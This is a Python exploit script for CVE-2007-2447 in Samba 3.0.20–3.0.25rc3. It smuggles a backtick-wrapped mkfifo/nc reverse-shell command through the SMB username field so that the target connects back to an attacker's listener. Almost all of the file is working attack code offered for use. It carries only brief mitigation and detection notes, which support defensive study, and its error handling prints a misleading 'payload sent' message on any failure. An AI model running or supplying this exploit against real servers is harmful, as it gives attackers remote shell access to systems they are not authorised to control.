#!/usr/bin/python
'''
Title: UsernameMapScript.py
Description: Exploits the command-injection RCE in Samba 3.0.20-3.0.25rc3 (CVE-2007-2447), which is reachable only
when the non-default "username map script" option is set in smb.conf, and has the target open a reverse shell to the attacker.
Service: Samba versions 3.0.20 to 3.0.25rc3
Reference: CVE-2007-2447, https://www.exploit-db.com/exploits/16320
Author: pwnd-root
'''
import sys
from smb.SMBConnection import SMBConnection
def exploit(rhost, rport, lhost, lport):
    """Send one SMB session request whose username carries a shell command.

    The command is wrapped in backticks inside the username field; per the
    module header, Samba 3.0.20-3.0.25rc3 evaluates it through the
    "username map script" configuration (CVE-2007-2447).

    Args:
        rhost: Address of the Samba server to connect to.
        rport: SMB port of the server; converted with int() before use.
        lhost: Address embedded in the command as the nc destination.
        lport: Port embedded in the command; must be a str, because it is
            joined into the command text.

    Defender notes:
        - Mitigation: run a patched Samba release and leave the
          "username map script" option out of smb.conf.
        - Detection: usernames in SMB session setup that contain backticks
          or other shell metacharacters; on the host, a FIFO appearing at
          /tmp/hago together with nc and /bin/sh processes (presumably
          children of smbd -- confirm on the target build).
    """
    # Shell command built from the caller's lhost/lport with no validation.
    shell_cmd = ''.join([
        'mkfifo /tmp/hago; nc ',
        lhost,
        ' ',
        lport,
        ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago',
    ])
    # The backtick-wrapped command is carried in the username field.
    crafted_user = ''.join(["/=`nohup ", shell_cmd, "`"])
    session = SMBConnection(crafted_user, "", "", "")
    try:
        port_number = int(rport)
        session.connect(rhost, port_number, timeout=1)
    except:
        # NOTE(review): the bare except swallows every error, so this message
        # is printed for a timeout, an unreachable host or a non-numeric port
        # alike, and nothing is printed when connect() returns normally.
        print('[+] Payload was sent')
# Script entry: print the CVE banner, then either run exploit() with the four
# positional arguments or show the usage text.
print('[*] CVE-2007-2447')
if len(sys.argv) == 5:
    # Arguments are forwarded as given; exploit() does the int() conversion
    # of the port and no other validation happens here.
    rhost, rport, lhost, lport = sys.argv[1:5]
    print("[+] Connecting to " + rhost)
    exploit(rhost, rport, lhost, lport)
else:
    print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    print("Enusre netcat listener is running")